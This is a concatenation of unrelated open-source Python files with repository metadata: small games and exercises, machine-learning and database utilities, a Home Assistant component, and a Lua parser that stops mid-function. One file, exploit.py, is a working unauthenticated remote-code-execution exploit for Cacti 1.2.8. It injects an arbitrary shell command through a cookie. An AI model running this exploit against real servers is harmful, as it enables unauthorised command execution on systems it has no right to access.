| 4 | 2017-01-18T17:51:58.000Z | 2019-10-20T12:14:37.000Z | practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py | zeyuanxy/HackerRank | 5194a4af780ece396501c215996685d1be529e73 | [
"MIT"
]
| null | null | null | practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py | zeyuanxy/HackerRank | 5194a4af780ece396501c215996685d1be529e73 | [
"MIT"
]
| 8 | 2016-03-14T17:16:59.000Z | 2021-06-26T10:11:33.000Z | if __name__ == "__main__":
data = raw_input().strip(',\n').split(' ')
count = 0
total = 0
for pxl in data:
pxl = pxl.split(',')
mean = 0
for i in pxl:
mean += int(i)
mean /= 3
if mean < 70:
count += 1
total += 1
if float(count) / total > 0.4:
print 'night'
else:
print 'day'
| 21.5 | 46 | 0.426357 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 33 | 0.085271 |
73087bd098e88fc78614d997333c9cb2a9e486e2 | 1,231 | py | Python | Mini Projects/RockPaperScissors/RPS.py | Snowystar122/Python-Projects | faf05ec388030b8b40ad7a8ca5c2760fb62cf5a3 | [
"MIT"
]
| null | null | null | Mini Projects/RockPaperScissors/RPS.py | Snowystar122/Python-Projects | faf05ec388030b8b40ad7a8ca5c2760fb62cf5a3 | [
"MIT"
]
| null | null | null | Mini Projects/RockPaperScissors/RPS.py | Snowystar122/Python-Projects | faf05ec388030b8b40ad7a8ca5c2760fb62cf5a3 | [
"MIT"
]
| null | null | null | import random as r
# Sets up required variables
running = True
user_wins = 0
comp_wins = 0
answers = ["R", "P", "S"]
win_combos = ["PR", "RS", "SP"]
# Welcome message
print("Welcome to Rock-Paper-Scissors. Please input one of the following:"
"\n'R' - rock\n'P' - paper\n'S' - scissors\nto get started.")
while running:
# Running game of rock, paper, scissors
if user_wins == 3 or comp_wins == 3:
print(f"Game is over. The score was {user_wins}-{comp_wins}. Thanks for playing.")
break
user_guess = input("Guess:").upper()
if user_guess.upper() not in answers:
print("You didn't enter a valid letter.")
break
comp_guess = answers[r.randint(0, 2)]
guess_join = user_guess + comp_guess
if guess_join[0] == guess_join[1]:
print(f"You both guessed {user_guess}!\nThe current score is {user_wins}-{comp_wins}.")
else:
# Checks to see if computer or user has won the round.
        if guess_join in win_combos:
user_wins += 1
print(f"You win! Score is {user_wins}-{comp_wins}.")
else:
comp_wins += 1
print(f"You lose! Score is {user_wins}-{comp_wins}.")
| 32.394737 | 95 | 0.622258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 575 | 0.4671 |
730b2987ac65ae096f7d5f37854abcd28bec2bf9 | 1,147 | py | Python | pybullet-gym/pybulletgym/agents/agents_baselines.py | SmaleZ/vcl_diayn | b2c47a681675b405d2011bc4a43c3914f3af4ecc | [
"MIT"
]
| 2 | 2021-07-12T17:11:35.000Z | 2021-07-13T05:56:30.000Z | pybullet-gym/pybulletgym/agents/agents_baselines.py | SmaleZ/vcl_diayn | b2c47a681675b405d2011bc4a43c3914f3af4ecc | [
"MIT"
]
| null | null | null | pybullet-gym/pybulletgym/agents/agents_baselines.py | SmaleZ/vcl_diayn | b2c47a681675b405d2011bc4a43c3914f3af4ecc | [
"MIT"
]
| null | null | null | from baselines import deepq
def add_opts(parser):
pass
class BaselinesDQNAgent(object):
'''
classdocs
'''
def __init__(self, opts):
self.metadata = {
'discrete_actions': True,
}
self.opts = opts
self.agent = None
def configure(self, observation_space_shape, nb_actions):
pass
def train(self, env, nb_steps, visualize, verbosity):
model = deepq.models.mlp([64])
self.agent = deepq.learn(
env,
q_func=model,
lr=1e-3,
max_timesteps=nb_steps,
buffer_size=50000,
exploration_fraction=0.1,
exploration_final_eps=0.02,
print_freq=10 if verbosity else None,
callback=env.render if visualize else None
)
def test(self, env, nb_episodes, visualize):
episodes = 0
while episodes < nb_episodes:
obs, done = env.reset(), False
episode_rew = 0
while not done:
if visualize:
env.render()
obs, rew, done, _ = env.step(self.agent(obs[None])[0])
episode_rew += rew
print("Episode reward", episode_rew)
episodes += 1
def load_weights(self, load_file):
self.agent = deepq.load(load_file)
def save_weights(self, save_file, overwrite):
self.agent.save(save_file) | 20.854545 | 58 | 0.691369 | 1,087 | 0.94769 | 0 | 0 | 0 | 0 | 0 | 0 | 53 | 0.046207 |
730be722fa533a8220a435fcc4009bd19bbb500f | 1,426 | py | Python | exploit.py | hexcowboy/CVE-2020-8813 | 0229d52f8b5adb63cc6d5bc757850a01a7800b8d | [
"MIT"
]
| null | null | null | exploit.py | hexcowboy/CVE-2020-8813 | 0229d52f8b5adb63cc6d5bc757850a01a7800b8d | [
"MIT"
]
| null | null | null | exploit.py | hexcowboy/CVE-2020-8813 | 0229d52f8b5adb63cc6d5bc757850a01a7800b8d | [
"MIT"
]
| null | null | null | #!/usr/bin/python3
import requests
import click
from rich import inspect
from rich.console import Console
from url_normalize import url_normalize
from urllib.parse import quote
console = Console()
def shell_encode(string):
return string.replace(" ", "${IFS}")
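# Illustrative example (not part of the original script):
#   shell_encode("cat /etc/passwd")  # -> "cat${IFS}/etc/passwd"
# ${IFS} stands in for whitespace so the payload survives contexts that strip
# or break on literal spaces.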
@click.command()
@click.option("-u", "--url", prompt="Target URL", help="The URL of the Cacti installation")
@click.option("-p", "--payload", prompt="Payload", help="The payload that you want to execute on the target")
def exploit(url, payload):
"""Cacti v1.2.8 Unauthenticated Remote Code Execution"""
# Normalize URL input, URL encode the payload
url = url + "/graph_realtime.php?action=init"
url = url_normalize(url, default_scheme="http")
payload = shell_encode(payload)
payload = quote(payload)
cookies = {"Cacti": payload}
# Check if target is vulnerable
try:
with console.status("Checking to see if target is vulnerable"):
request = requests.get(url)
except:
console.print(f'Could not connect to the host, please check the URL again: {url}', style="red")
exit(1)
inspect(request)
if request.status_code == 200:
with console.status("Realtime graph found, sending payload."):
requests.get(url, cookies=cookies)
else:
click.echo("Realtime graph not found. The target may not be vulnerable.")
if __name__ == "__main__":
exploit()
| 31 | 109 | 0.680224 | 0 | 0 | 0 | 0 | 1,114 | 0.781206 | 0 | 0 | 565 | 0.396213 |
730d40eb64f626d437281807fa30ca37ecd18cc5 | 1,119 | py | Python | common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py | kmcm0/stacki | eb9dff1b45d5725b4986e567876bf61707fec28f | [
"BSD-3-Clause"
]
| 123 | 2015-05-12T23:36:45.000Z | 2017-07-05T23:26:57.000Z | common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py | kmcm0/stacki | eb9dff1b45d5725b4986e567876bf61707fec28f | [
"BSD-3-Clause"
]
| 177 | 2015-06-05T19:17:47.000Z | 2017-07-07T17:57:24.000Z | common/src/stack/command/stack/commands/set/firmware/model/imp/__init__.py | kmcm0/stacki | eb9dff1b45d5725b4986e567876bf61707fec28f | [
"BSD-3-Clause"
]
| 32 | 2015-06-07T02:25:03.000Z | 2017-06-23T07:35:35.000Z | # @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
#
# @rocks@
# Copyright (c) 2000 - 2010 The Regents of the University of California
# All rights reserved. Rocks(r) v5.4 www.rocksclusters.org
# https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt
# @rocks@
import stack.commands
class Command(stack.commands.set.firmware.command):
"""
Associates a firmware implementation with one or more models.
<arg type='string' name='models'>
One or more models to associate the implementation with.
</arg>
<param type='string' name='imp'>
The name of the implementation to associate with the provided models.
</param>
<param type='string' name='make'>
The make of the models.
</param>
<example cmd="set firmware model imp m7800 m6036 imp=mellanox_6xxx_7xxx make=mellanox">
Sets the mellanox_6xxx_7xxx implementation as the one to run for the models m7800 and m6036 for make mellanox.
</example>
"""
def run(self, params, args):
self.runPlugins(args = (params, args))
| 29.447368 | 111 | 0.739946 | 699 | 0.624665 | 0 | 0 | 0 | 0 | 0 | 0 | 958 | 0.856122 |
73106dc1db1187afa8a045a4fa929befaa9cbf34 | 5,939 | py | Python | torch/jit/_fuser.py | ljhOfGithub/pytorch | c568f7b16f2a98d72ff5b7c6c6161b67b2c27514 | [
"Intel"
]
| 1 | 2022-03-29T00:44:31.000Z | 2022-03-29T00:44:31.000Z | torch/jit/_fuser.py | ljhOfGithub/pytorch | c568f7b16f2a98d72ff5b7c6c6161b67b2c27514 | [
"Intel"
]
| null | null | null | torch/jit/_fuser.py | ljhOfGithub/pytorch | c568f7b16f2a98d72ff5b7c6c6161b67b2c27514 | [
"Intel"
]
| 1 | 2022-03-28T21:49:41.000Z | 2022-03-28T21:49:41.000Z | import contextlib
import torch
from typing import List, Tuple
@contextlib.contextmanager
def optimized_execution(should_optimize):
"""
A context manager that controls whether the JIT's executor will run
optimizations before executing a function.
"""
stored_flag = torch._C._get_graph_executor_optimize()
torch._C._set_graph_executor_optimize(should_optimize)
try:
yield
finally:
torch._C._set_graph_executor_optimize(stored_flag)
@contextlib.contextmanager
def fuser(name):
"""
A context manager that facilitates switching between
backend fusers.
Valid names:
* ``fuser0`` - enables only legacy fuser
* ``fuser1`` - enables only NNC
* ``fuser2`` - enables only nvFuser
"""
old_cpu_fuse = torch._C._jit_can_fuse_on_cpu()
old_gpu_fuse = torch._C._jit_can_fuse_on_gpu()
old_texpr_fuser_state = torch._C._jit_texpr_fuser_enabled()
old_nvfuser_state = torch._C._jit_nvfuser_enabled()
if name == 'fuser0': # legacy fuser
torch._C._jit_override_can_fuse_on_cpu(True)
torch._C._jit_override_can_fuse_on_gpu(True)
torch._C._jit_set_texpr_fuser_enabled(False)
torch._C._jit_set_nvfuser_enabled(False)
elif name == 'fuser1': # NNC
old_profiling_executor = torch._C._jit_set_profiling_executor(True)
old_profiling_mode = torch._C._jit_set_profiling_mode(True)
torch._C._jit_override_can_fuse_on_cpu(True)
torch._C._jit_override_can_fuse_on_gpu(True)
torch._C._jit_set_texpr_fuser_enabled(True)
torch._C._jit_set_nvfuser_enabled(False)
elif name == 'fuser2': # nvFuser
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_override_can_fuse_on_gpu(False)
torch._C._jit_set_texpr_fuser_enabled(False)
torch._C._jit_set_nvfuser_enabled(True)
else:
raise Exception("unrecognized fuser option")
try:
yield
finally:
if name == 'fuser1': # NNC
torch._C._jit_set_profiling_executor(old_profiling_executor)
torch._C._jit_set_profiling_mode(old_profiling_mode)
# recover the previous values
torch._C._jit_override_can_fuse_on_cpu(old_cpu_fuse)
torch._C._jit_override_can_fuse_on_gpu(old_gpu_fuse)
torch._C._jit_set_texpr_fuser_enabled(old_texpr_fuser_state)
torch._C._jit_set_nvfuser_enabled(old_nvfuser_state)
last_executed_optimized_graph = torch._C._last_executed_optimized_graph
def _get_differentiable_graph_node(node, diff_node):
if node.kind() == 'prim::DifferentiableGraph':
diff_node.append(node)
else:
for block in node.blocks():
for n in block.nodes():
_get_differentiable_graph_node(n, diff_node)
def _graph_for(self, *args, **kwargs):
return _script_method_graph_for(self, self, *args, **kwargs)
def _script_method_graph_for(self, parent, *args, **kwargs):
try:
dbs = parent.get_debug_state()
eps = list(dbs.execution_plans.values())
assert(len(eps) == 1)
graph = eps[0].graph.copy()
# graph_executor_states for differentiable node
fw_states = eps[0].code.differentiable_op_executor_states()
diff_nodes: List[torch._C.Node] = []
for n in graph.nodes():
_get_differentiable_graph_node(n, diff_nodes)
assert(len(fw_states) == len(diff_nodes))
# swap each differentiable graph with optimized graph in their execution plan
for n, state in zip(diff_nodes, fw_states):
fw_execution_plans = list(state.execution_plans.values())
# we can only update the subgraph when there's a unique execution
# plan. Avoid assert here so we would skip the ones that can't be
# updated while try the best effort to update other nodes.
if len(fw_execution_plans) == 1:
n.g_('Subgraph', fw_execution_plans[0].graph)
return graph
except Exception:
# fallback approach, we just ran the graph and return the recorded optimized
# graph
self(*args, **kwargs)
return last_executed_optimized_graph()
def set_fusion_strategy(strategy: List[Tuple[str, int]]):
"""
Sets the type and number of specializations that can occur during fusion.
Usage: provide a list of pairs (type, depth) where type is one of "STATIC" or "DYNAMIC"
and depth is an integer.
Behavior - static vs dynamic:
In STATIC fusion, fused ops are compiled to have fixed input shapes. The shape is determined
based on some initial profiling runs.
In DYNAMIC fusion, fused ops are compiled to have variable input shapes, so that multiple
shapes are possible.
In both cases, we also recompile on new striding behavior, device, or dtype.
Behavior - fallback functions & depth:
When an input doesn't match the format required by the specialized compiled op, it will run
a fallback function. Fallback functions are recursively be compiled and specialized based
on the observed tensor shapes. Since compilation can be slow, the "depth" parameter is provided to
limit the number of specializations that can be compiled, before giving up on recompiling and
falling back to a completely un-fused, un-specialized implementation.
The list of (type, depth) pairs controls the type of specializations and the number of
specializations. For example: [("STATIC", 2), ("DYNAMIC", 2)] indicates that the first
two specializations will use static fusions, the following two specializations will use
dynamic fusion, and any inputs that satisfy none of the 4 options will run an
unfused implementation.
NB: in the future, if more as more fusion backends are added there may be more granular
apis for specific fusers.
"""
return torch._C._jit_set_fusion_strategy(strategy)
| 42.120567 | 106 | 0.706348 | 0 | 0 | 2,302 | 0.387607 | 2,356 | 0.3967 | 0 | 0 | 2,549 | 0.429197 |
73111dceec02df0e21147895187850aaff39304f | 4,420 | py | Python | modlit/db/postgres.py | patdaburu/modlit | 9c9c153b74f116357e856e4c204c9a83bb15398f | [
"MIT"
]
| null | null | null | modlit/db/postgres.py | patdaburu/modlit | 9c9c153b74f116357e856e4c204c9a83bb15398f | [
"MIT"
]
| null | null | null | modlit/db/postgres.py | patdaburu/modlit | 9c9c153b74f116357e856e4c204c9a83bb15398f | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by pat on 5/8/18
"""
.. currentmodule:: modlit.db.postgres
.. moduleauthor:: Pat Daburu <[email protected]>
This module contains utilities for working directly with PostgreSQL.
"""
import json
from pathlib import Path
from urllib.parse import urlparse, ParseResult
from addict import Dict
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
DEFAULT_ADMIN_DB = 'postgres' #: the default administrative database name
DEFAULT_PG_PORT = 5432 #: the default PostgreSQL listener port
# Load the Postgres phrasebook.
# pylint: disable=invalid-name
# pylint: disable=no-member
sql_phrasebook = Dict(
json.loads(
(
Path(__file__).resolve().parent / 'postgres.json'
).read_text()
)['sql']
)
def connect(url: str, dbname: str = None, autocommit: bool = False):
"""
Create a connection to a Postgres database.
:param url: the Postgres instance URL
:param dbname: the target database name (if it differs from the one
specified in the URL)
:param autocommit: Set the `autocommit` flag on the connection?
:return: a psycopg2 connection
"""
# Parse the URL. (We'll need the pieces to construct an ogr2ogr connection
# string.)
dbp: ParseResult = urlparse(url)
# Create a dictionary to hold the arguments for the connection. (We'll
# unpack it later.)
cnx_opt = {
k: v for k, v in
{
'host': dbp.hostname,
'port': int(dbp.port) if dbp.port is not None else DEFAULT_PG_PORT,
'database': dbname if dbname is not None else dbp.path[1:],
'user': dbp.username,
'password': dbp.password
}.items() if v is not None
}
cnx = psycopg2.connect(**cnx_opt)
# If the caller requested that the 'autocommit' flag be set...
if autocommit:
# ...do that now.
cnx.autocommit = True
return cnx
def db_exists(url: str,
dbname: str = None,
admindb: str = DEFAULT_ADMIN_DB) -> bool:
"""
Does a given database on a Postgres instance exist?
:param url: the Postgres instance URL
:param dbname: the name of the database to test
:param admindb: the name of an existing (presumably the main) database
:return: `True` if the database exists, otherwise `False`
"""
# Let's see what we got for the database name.
_dbname = dbname
# If the caller didn't specify a database name...
if not _dbname:
# ...let's figure it out from the URL.
db: ParseResult = urlparse(url)
_dbname = db.path[1:]
# Now, let's do this!
with connect(url=url, dbname=admindb) as cnx:
with cnx.cursor() as crs:
# Execute the SQL query that counts the databases with a specified
# name.
crs.execute(
sql_phrasebook.select_db_count.format(_dbname)
)
# If the count isn't zero (0) the database exists.
return crs.fetchone()[0] != 0
def create_db(
url: str,
dbname: str,
admindb: str = DEFAULT_ADMIN_DB):
"""
Create a database on a Postgres instance.
:param url: the Postgres instance URL
:param dbname: the name of the database
:param admindb: the name of an existing (presumably the main) database
"""
with connect(url=url, dbname=admindb) as cnx:
cnx.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
with cnx.cursor() as crs:
crs.execute(sql_phrasebook.create_db.format(dbname))
def touch_db(
url: str,
dbname: str = None,
admindb: str = DEFAULT_ADMIN_DB):
"""
Create a database if it does not already exist.
:param url: the Postgres instance URL
:param dbname: the name of the database
:param admindb: the name of an existing (presumably the main) database
"""
# If the database already exists, we don't need to do anything further.
if db_exists(url=url, dbname=dbname, admindb=admindb):
return
# Let's see what we got for the database name.
_dbname = dbname
# If the caller didn't specify a database name...
if not _dbname:
# ...let's figure it out from the URL.
db: ParseResult = urlparse(url)
_dbname = db.path[1:]
# Now we can create it.
create_db(url=url, dbname=_dbname, admindb=admindb)
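

# A minimal usage sketch; the connection URL below is an illustrative
# assumption, not a real server.
def _example_touch_db():  # pragma: no cover
    url = 'postgresql://user:secret@localhost:5432/modlit'
    # Create the 'modlit' database if it does not exist yet...
    touch_db(url=url)
    # ...then connect to it and run a trivial query.
    with connect(url=url) as cnx:
        with cnx.cursor() as crs:
            crs.execute('SELECT 1')
            return crs.fetchone()[0]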
| 32.262774 | 79 | 0.640045 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,277 | 0.515158 |
7311fe6464a3f41ba16f8290bf926cae00157858 | 3,179 | py | Python | estradaspt_legacy/__init__.py | dpjrodrigues/home-assistant-custom-components | 105feec36ea065e62e839b5137a9ee2e2dcf3513 | [
"MIT"
]
| null | null | null | estradaspt_legacy/__init__.py | dpjrodrigues/home-assistant-custom-components | 105feec36ea065e62e839b5137a9ee2e2dcf3513 | [
"MIT"
]
| null | null | null | estradaspt_legacy/__init__.py | dpjrodrigues/home-assistant-custom-components | 105feec36ea065e62e839b5137a9ee2e2dcf3513 | [
"MIT"
]
| 5 | 2018-12-29T16:39:25.000Z | 2019-12-21T22:29:22.000Z | import logging
import async_timeout
import urllib.request
import time
import re
from datetime import datetime, timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.util import Throttle
from homeassistant.helpers.aiohttp_client import async_get_clientsession
REQUIREMENTS = ['pyEstradasPT==1.0.2']
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Powered by estradas.pt"
CONF_CAMERA = 'camera'
SCAN_INTERVAL = timedelta(minutes=5)
DOMAIN = 'estradaspt'
PLATFORM_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_CAMERA): vol.All(cv.ensure_list, [cv.string])
})
}, extra=vol.ALLOW_EXTRA)
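# A minimal configuration.yaml sketch for this component (the camera name is an
# illustrative placeholder; use a camera name known to estradas.pt):
#
#   estradaspt:
#     camera:
#       - "Ponte 25 de Abril"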
async def async_setup(hass, config):
"""Set up the Camera component"""
from pyEstradasPT import Cameras
websession = async_get_clientsession(hass)
with async_timeout.timeout(10, loop=hass.loop):
cameras = await Cameras.get(websession)
component = EntityComponent(_LOGGER, DOMAIN, hass)
entities = []
conf = config.get(DOMAIN)
for camera in conf[0].get(CONF_CAMERA):
url = await cameras.UrlByCameraName(camera)
file_name='/config/www/'+re.sub('[^A-Za-z0-9]+', '', camera)+'.3gp'
entities.append(CameraVideo(camera,file_name,url))
await store_cam_video(url, file_name)
await component.async_add_entities(entities)
return True
async def store_cam_video(url, file_name):
"""Save camera 3gp """
urllib.request.urlretrieve(url, file_name)
class CameraVideo(Entity):
"""Sensor that reads and stores the camera video."""
ICON = 'mdi:webcam'
def __init__(self, name, file_name, url):
"""Initialize the component."""
self._name = name
self._file_name = file_name
self._url = url
self._last_update = datetime.now()
@property
def name(self):
"""Return the name of the component."""
return self._name
@property
def file_name(self):
"""Return the file_name where camara was saved."""
return self._file_name
@property
def url(self):
"""Return the url of the camera."""
        return self._url
@property
def last_update(self):
"""Return the date when camera url refreshed."""
return self._last_update
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self.ICON
@property
def device_state_attributes(self):
"""Return other details about the sensor state."""
attrs = {}
attrs["name"] = self._name
attrs["last_update"] = self._last_update
attrs["file_name"] = self._file_name
attrs["url"] = self._url
return attrs
@Throttle(SCAN_INTERVAL)
async def async_update(self):
"""Update the cam."""
await store_cam_video(self._url, self._file_name)
self._last_update = datetime.now()
self.schedule_update_ha_state()
| 27.17094 | 75 | 0.674111 | 1,475 | 0.463691 | 0 | 0 | 1,100 | 0.345803 | 1,037 | 0.325998 | 572 | 0.179818 |
7311ffda56e787743243c236f69f050e734a7937 | 22,262 | py | Python | parser.py | boshijingang/PyLuaCompiler | 37cdf73286d020b2d119635d6d2609a5d9debfed | [
"MIT"
]
| null | null | null | parser.py | boshijingang/PyLuaCompiler | 37cdf73286d020b2d119635d6d2609a5d9debfed | [
"MIT"
]
| null | null | null | parser.py | boshijingang/PyLuaCompiler | 37cdf73286d020b2d119635d6d2609a5d9debfed | [
"MIT"
]
| null | null | null | import lexer
import ast
class Parser:
block_end_tokens = [lexer.TokenKind.KW_RETURN, lexer.TokenKind.EOF,
lexer.TokenKind.KW_END, lexer.TokenKind.KW_ELSE,
lexer.TokenKind.KW_ELSEIF, lexer.TokenKind.KW_UNTIL]
priority_table = {
lexer.TokenKind.OP_ADD: {'left': 10, 'right': 10}, # +
lexer.TokenKind.OP_SUB: {'left': 10, 'right': 10}, # -
lexer.TokenKind.OP_MUL: {'left': 11, 'right': 11}, # *
lexer.TokenKind.OP_MOD: {'left': 11, 'right': 11}, # %
lexer.TokenKind.OP_DIV: {'left': 11, 'right': 11}, # /
lexer.TokenKind.OP_IDIV: {'left': 11, 'right': 11}, # //
lexer.TokenKind.OP_POW: {'left': 14, 'right': 13}, # ^
lexer.TokenKind.OP_BAND: {'left': 6, 'right': 6}, # &
lexer.TokenKind.OP_BOR: {'left': 4, 'right': 4}, # |
lexer.TokenKind.OP_BNOT: {'left': 5, 'right': 5}, # ~
lexer.TokenKind.OP_SHL: {'left': 7, 'right': 7}, # <<
lexer.TokenKind.OP_SHR: {'left': 7, 'right': 7}, # >>
lexer.TokenKind.OP_CONCAT: {'left': 9, 'right': 8}, # ..
lexer.TokenKind.OP_EQ: {'left': 3, 'right': 3}, # ==
lexer.TokenKind.OP_LE: {'left': 3, 'right': 3}, # <=
lexer.TokenKind.OP_LT: {'left': 3, 'right': 3}, # <
lexer.TokenKind.OP_NE: {'left': 3, 'right': 3}, # ~=
lexer.TokenKind.OP_GT: {'left': 3, 'right': 3}, # >
lexer.TokenKind.OP_GE: {'left': 3, 'right': 3}, # >=
lexer.TokenKind.OP_AND: {'left': 2, 'right': 2}, # and
lexer.TokenKind.OP_OR: {'left': 1, 'right': 1}, # or
}
unops = [
lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_NOT,
lexer.TokenKind.OP_LEN, lexer.TokenKind.OP_BNOT
]
binops = [
lexer.TokenKind.OP_ADD, lexer.TokenKind.OP_SUB,
lexer.TokenKind.OP_MUL, lexer.TokenKind.OP_MOD,
lexer.TokenKind.OP_POW, lexer.TokenKind.OP_DIV,
lexer.TokenKind.OP_IDIV, lexer.TokenKind.OP_BAND,
lexer.TokenKind.OP_BOR, lexer.TokenKind.OP_BXOR,
lexer.TokenKind.OP_SHL, lexer.TokenKind.OP_SHR,
lexer.TokenKind.OP_CONCAT, lexer.TokenKind.OP_NE,
lexer.TokenKind.OP_EQ, lexer.TokenKind.OP_LT,
lexer.TokenKind.OP_LE, lexer.TokenKind.OP_GT,
lexer.TokenKind.OP_GE, lexer.TokenKind.OP_AND,
lexer.TokenKind.OP_OR
]
unary_priority = 12
def __init__(self, lex):
self.lex = lex
def parse(self):
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.EOF)
return block
# explist ::= exp {‘,’ exp}
def parse_exp_list(self):
exp_list = []
exp_list.append(self.parse_exp(0)[1])
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
exp_list.append(self.parse_exp(0)[1])
return exp_list
# exp ::= (simpleexp | unop exp) {binop exp}
def parse_exp(self, prev_priority):
token = self.lex.look_ahead()
if token.kind in self.unops:
self.lex.next_token()
op_left = ast.UnopExp(self.parse_exp(self.unary_priority)[1], token.kind)
else:
op_left = self.parse_simple_exp()
bin_op = self.lex.look_ahead().kind
while bin_op in self.binops and self.priority_table[bin_op]['left'] > prev_priority:
bin_op, op_left = self.parse_binop_exp(op_left, self.priority_table[bin_op]['right'])
return bin_op, op_left
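    # Worked sketch of the precedence climbing above (illustrative, not extra
    # grammar): for `1 + 2 * 3`, parse_exp(0) reads `1`, sees `+` whose left
    # priority 10 > 0, and recurses with `+`'s right priority 10; the recursive
    # call reads `2`, sees `*` whose left priority 11 > 10, so `*` binds first
    # and the result is BinopExp(1, BinopExp(2, 3, OP_MUL), OP_ADD).
    # For `2 ^ 3 ^ 4`, OP_POW's right priority (13) is below its left priority
    # (14), so the recursion keeps consuming `^` and groups it as 2 ^ (3 ^ 4).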
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_func_args(self):
look_token = self.lex.look_ahead()
exp_list = []
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RPAREN:
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
exp_list = [self.parse_table_constructor_exp()]
else:
exp_list = [ast.String(self.lex.next_token_of_kind(lexer.TokenKind.STRING)).data]
return exp_list
# simpleexp ::= nil | false | true | Numeral | LiteralString | ‘...’ |
# functiondef | prefixexp | tableconstructor
def parse_simple_exp(self):
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.KW_NIL:
self.lex.next_token()
return ast.NilExp()
elif look_token.kind == lexer.TokenKind.KW_FALSE:
self.lex.next_token()
return ast.BoolConstExp(False)
elif look_token.kind == lexer.TokenKind.KW_TRUE:
self.lex.next_token()
return ast.BoolConstExp(True)
elif look_token.kind == lexer.TokenKind.NUMBER:
return self.parse_number_exp()
elif look_token.kind == lexer.TokenKind.STRING:
self.lex.next_token()
return ast.StringExp(look_token.data)
elif look_token.kind == lexer.TokenKind.VARARG:
self.lex.next_token()
return ast.VarargExp()
elif look_token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_exp()
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
return self.parse_table_constructor_exp()
else:
return self.parse_prefix_exp()
def parse_func_def_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_body_exp = self.parse_func_body_exp(False)
return func_body_exp
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_table_constructor_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LCURLY)
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RCURLY:
key_list, val_list = self.parse_field_list()
else:
key_list = []
val_list = []
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RCURLY)
return ast.TableConstructorExp(key_list, val_list)
# fieldlist ::= field {fieldsep field} [fieldsep]
# fieldsep ::= ‘,’ | ‘;’
def parse_field_list(self):
key, val = self.parse_field()
key_list = [key]
val_list = [val]
while self.lex.look_ahead().kind in [lexer.TokenKind.SEP_COMMA, lexer.TokenKind.SEP_SEMI]:
self.lex.next_token()
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RCURLY:
break
else:
key, val = self.parse_field()
key_list.append(key)
val_list.append(val)
return key_list, val_list
# field ::= ‘[’ exp ‘]’ ‘=’ exp | Name ‘=’ exp | exp
def parse_field(self):
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
key_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
exp = self.parse_exp(0)[1]
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
if not isinstance(exp, ast.NameExp):
raise Exception("syntax error near '%s'" % token)
self.lex.next_token()
key_exp = ast.StringExp(exp.id_name)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
return ast.NilExp(), exp
# binop exp
def parse_binop_exp(self, op_left, prev_priority):
token = self.lex.next_token()
if token.kind not in self.binops:
raise Exception("syntax error near '%s'" % token)
bin_op, op_right = self.parse_exp(prev_priority)
return bin_op, ast.BinopExp(op_left, op_right, token.kind)
def parse_number_exp(self):
token = self.lex.next_token_of_kind(lexer.TokenKind.NUMBER)
val = eval(token.data)
if isinstance(val, int):
return ast.IntegerExp(val)
else:
return ast.FloatExp(val)
# retstat ::= return [explist] [‘;’]
def parse_retstat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_RETURN)
exp_list = []
token = self.lex.look_ahead()
if not self.is_block_end(token.kind) and token.kind != lexer.TokenKind.SEP_SEMI:
exp_list = self.parse_exp_list()
return ast.RetStat(exp_list)
# block ::= {stat} [retstat]
def parse_block(self):
stats = self.parse_stats()
block = ast.Block(stats)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_RETURN:
retstat = self.parse_retstat()
block.append_stat(retstat)
return block
def parse_goto_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_GOTO)
label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
return ast.GotoStat(label)
def parse_do_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
